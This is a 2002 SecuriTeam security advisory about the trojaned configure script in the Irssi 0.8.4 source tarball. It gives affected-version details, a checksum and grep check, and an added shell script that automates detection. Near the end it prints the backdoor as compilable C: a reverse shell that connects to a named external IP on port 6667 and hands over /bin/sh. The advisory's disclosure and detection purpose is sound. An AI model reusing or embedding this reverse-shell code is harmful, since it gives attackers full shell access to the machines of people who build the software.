[UNIX] Irssi IRC Found to Contain a Backdoor

From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 26 May 2002 18:27:13 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Irssi IRC Found to Contain a Backdoor
------------------------------------------------------------------------

SUMMARY

The main web site of the Irssi distribution, <http://irssi.org/>, was
compromised (the intrusion appears to have happened over two months before
it was noticed and has only recently been detected), and the tarball
distributed from the site was trojaned with a backdoor. All users of the IRC
client should either upgrade, or download the latest version from the web
site and verify its MD5 checksum against the value given below.

DETAILS

What did the backdoor do? How to get rid of it?
The backdoored configure script forks, connects out to a remote server and
hands it a /bin/sh with stdin, stdout and stderr tied to the connection, so
whoever controls that server gets full shell access to the build host with
the privileges of the user who ran configure. It might therefore have done
anything.

At least currently, the server it connects to does not do anything
automatically; we would guess that it simply waits for incoming commands.
As for cleaning up, that depends on what was done through the shell, and we
do not yet know that. Possibly nothing was done and you need not do
anything; possibly a rootkit was installed and you will need to reinstall
the whole system. We would suggest doing that if you have any doubt.

In any case, make sure the backdoor process is no longer running: kill any
stray /bin/sh process (on a suspect build host, look for one whose standard
input, output and error are a TCP socket connected to port 6667), or reboot.

How do I know if I'm affected?
The backdoor was only in "configure"; the built binary itself is not
backdoored. Here are some ways to tell whether you are affected:
 * If you installed Irssi from a binary package, you are safe.
 * Debian sources were not backdoored.
 * Nightly source snapshots do not seem to be backdoored.
 * CVS does not seem to be backdoored.
 * The irssi-0.8.4.tar.bz2 file was not backdoored; only the .tar.gz was.
 * The FreeBSD port was not backdoored, as it used the .bz2 file.
 * The Irssi/SILC client was not backdoored.
 * If you let Irssi download the GLib sources from irssi.org, they are
backdoored (the same configure trick as with Irssi).
 * If you still have the sources, run "grep SOCK_STREAM configure". If it
prints any lines, the configure script is backdoored.
 * The MD5 checksum of the originally released irssi-0.8.4.tar.gz is
57bf9d89638be3d377be211f0b0d7049; the 0.8.4a tarball has the same checksum.
Since the web site itself was compromised, compare your download against
this value rather than against a checksum fetched from the same site.
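The checks in the list above, scripted so they can be run over a downloaded
tarball and its unpacked configure script. This is an added example and is
not part of the advisory or of Irssi's own tooling. The checksum and the two
callback IP addresses come from the advisory; the two sample configure files
are constructed here for demonstration, and the live-process check assumes a
Linux /proc filesystem.

```shell
#!/bin/sh
# Added example: scripted indicator checks for the irssi-0.8.4.tar.gz
# configure backdoor. Only KNOWN_MD5 and KNOWN_IPS come from the advisory;
# the sample configure files further down are constructed for this demo.

KNOWN_MD5=57bf9d89638be3d377be211f0b0d7049     # published md5 of irssi-0.8.4.tar.gz
KNOWN_IPS='204.120.36.206 209.164.15.215'      # callback hosts seen in the backdoor

# file_md5 FILE: print the MD5 of FILE using whichever tool the system has.
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | awk '{print $1}'
    else
        md5 -q "$1"
    fi
}

# tarball_matches FILE EXPECTED_MD5: prints 1 if the checksums agree, else 0.
tarball_matches() {
    if [ "$(file_md5 "$1")" = "$2" ]; then echo 1; else echo 0; fi
}

# configure_is_backdoored FILE: the advisory's indicator. A genuine Irssi
# configure script never mentions SOCK_STREAM, so any hit means trouble.
configure_is_backdoored() {
    if grep -q 'SOCK_STREAM' "$1"; then echo 1; else echo 0; fi
}

# configure_callback_ips FILE: list which of the known callback addresses
# appear in FILE, one per line (empty output if none).
configure_callback_ips() {
    for ip in $KNOWN_IPS; do
        if grep -qF "$ip" "$1"; then echo "$ip"; fi
    done
}

# live_backdoor_pids: on Linux, list sh processes whose stdin is a socket,
# which is what the exec'd shell looks like after dup2(s, 0). Assumes /proc.
live_backdoor_pids() {
    [ -d /proc ] || return 0
    for fd in /proc/[0-9]*/fd/0; do
        pid=${fd#/proc/}; pid=${pid%%/*}
        target=$(readlink "$fd" 2>/dev/null) || continue
        case "$target" in socket:*) ;; *) continue ;; esac
        grep -qx 'sh' "/proc/$pid/comm" 2>/dev/null && echo "$pid"
    done
    return 0
}

# --- constructed samples (not real files from irssi.org) -----------------
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
CLEAN="$WORK/configure.clean"
BAD="$WORK/configure.bad"
cat >"$CLEAN" <<'EOF'
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
ac_default_prefix=/usr/local
EOF
# The bad sample embeds two lines quoted from the advisory's backdoor listing.
cat >"$BAD" <<'EOF'
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
        sa.sin_addr.s_addr = inet_addr("204.120.36.206");
EOF

# report: run every check over the two samples and print the verdicts.
report() {
    for f in "$CLEAN" "$BAD"; do
        echo "$f: backdoored=$(configure_is_backdoored "$f") ips=$(configure_callback_ips "$f" | tr '\n' ' ')"
    done
    echo "sample vs published md5: $(tarball_matches "$BAD" "$KNOWN_MD5") (0 = does not match)"
    echo "sh processes with a socket on stdin: $(live_backdoor_pids | tr '\n' ' ')"
}
report
```

Run it against a real download with `configure_is_backdoored path/to/configure`
and `tarball_matches irssi-0.8.4.tar.gz "$KNOWN_MD5"` after unpacking; the
grep indicator is the decisive test, the checksum only confirms an untouched
download.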

What exactly was the backdoor?
These lines were found in the configure script, embedded in one of the C
test programs that configure compiles and runs. The unrelated autoconf
comments interleaved with them in the original are omitted here, and the
includes and main() needed to compile the fragment on its own are added;
the backdoor logic itself is unchanged:

        #include <stdlib.h>
        #include <string.h>
        #include <unistd.h>
        #include <sys/socket.h>
        #include <netinet/in.h>
        #include <arpa/inet.h>

        int main(void)
        {
                int s;
                struct sockaddr_in sa;
                /* Detach: the child carries on, the parent exits at once so
                   the configure test appears to finish normally. */
                switch(fork()) { case 0: break; default: exit(0); }
                if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                        exit(1);
                }
                /* Connect back to the attacker's host on TCP port 6667 (the
                   IRC port, so the traffic blends in with IRC). */
                memset(&sa, 0, sizeof(sa));
                sa.sin_family = AF_INET;
                sa.sin_port = htons(6667);
                sa.sin_addr.s_addr = inet_addr("204.120.36.206");
                if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                        exit(1);
                }
                /* Tie stdin, stdout and stderr to the socket ... */
                dup2(s, 0); dup2(s, 1); dup2(s, 2);
                /* ... and replace this process with a shell: a reverse shell
                   running as whoever ran ./configure. */
                { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
                return 1;
        }

The IP address in the script was also changed the day before this was
written; the earlier version connected to 209.164.15.215.

ADDITIONAL INFORMATION

The information has been provided by Martin Östlund <martin@webtech.se>.


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


